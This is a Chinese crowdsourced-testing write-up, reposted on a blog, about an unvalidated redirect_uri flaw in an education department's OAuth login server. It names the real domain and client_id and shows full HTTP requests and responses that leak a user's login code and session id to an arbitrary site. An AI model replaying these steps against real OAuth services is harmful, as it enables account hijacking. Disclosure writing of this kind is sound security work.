漏洞挖掘之众测厂商某教育厅 redirect_uri 授权劫持漏洞

2019-04-10 约 736 字 预计阅读 2 分钟

声明:本文 【漏洞挖掘之众测厂商某教育厅 redirect_uri 授权劫持漏洞】 由作者 phpoop 于 2019-04-10 09:45:00 首发 先知社区 曾经 浏览数 18 次

感谢 phpoop 的辛苦付出!

0x01 概要

打码不规范,亲人两行泪
实战域名将修改为: duijie.zjer.cn

漏洞url:http://domain.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com

redirect_uri 完全没验证导致可任意url获取token

0x02 请求包

0x02.1 请求包1:

Request:

POST http://domain.com:8087/oauthserver/loginAction.action HTTP/1.1
Host: domain.com:8087
Connection: keep-alive
Content-Length: 196
Cache-Control: max-age=0
Origin: http://domain.com:8087
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://domain.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: cookie不能给你哦~

user.redirect_uri=http%3A%2F%2Fbaidu.com&user.response_type=&user.client_id=7D4A4A2C4B701548F97FA88C379447BA&user.state=&user.scope=&user.resource_url=&user.account=tsetaaaa&user.password=tsetaaaa

Response:

HTTP/1.1 302 Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=2006E057AE8523895F2DB0F85A84E321; Path=/oauthserver; Secure; HttpOnly
Location: http://baidu.com?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa
Content-Length: 0
Date: Tue, 19 Mar 2019 08:56:42 GMT
0x02.2 请求包2:

Request:

GET http://baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa HTTP/1.1
Host: baidu.com
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://domain.com:8087/oauthserver/?client_id=7D4A4A2C4B701548F97FA88C379447BA&state=1&response_type=code&redirect_uri=http://baidu.com
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: cookie不能给你哦~

Response:

HTTP/1.1 302 Moved Temporarily
Server: bfe/1.0.8.18
Date: Tue, 19 Mar 2019 08:56:43 GMT
Content-Type: text/html
Content-Length: 161
Connection: Keep-Alive
Location: https://www.baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa
Expires: Wed, 20 Mar 2019 08:56:43 GMT
Cache-Control: max-age=86400
Cache-Control: privae

<html>
<head><title>302 Found</title></head>
<body bgcolor="white">
<center><h1>302 Found</h1></center>
<hr><center>bfe/1.0.8.18</center>
</body>
</html>

用户登录token:https://www.baidu.com/?clientid=7D4A4A2C4B701548F97FA88C379447BA&oauthCode=9b2fc7458c4a75c45e1942cc838d9c97&code=9b2fc7458c4a75c45e1942cc838d9c97&usessionid=093c8b66-cbc6-47b0-8733-f4a200b593db&account=tsetaaaa

然后即可利用这token进行用户登录了

关键词:[‘渗透测试’, ‘渗透测试’]


author

旭达网络

旭达网络技术博客,曾记录各种技术问题,一贴搞定.
本文采用知识共享署名 4.0 国际许可协议进行许可。

We notice you're using an adblocker. If you like our webite please keep us running by whitelisting this site in your ad blocker. We’re serving quality, related ads only. Thank you!

I've whitelisted your website.

Not now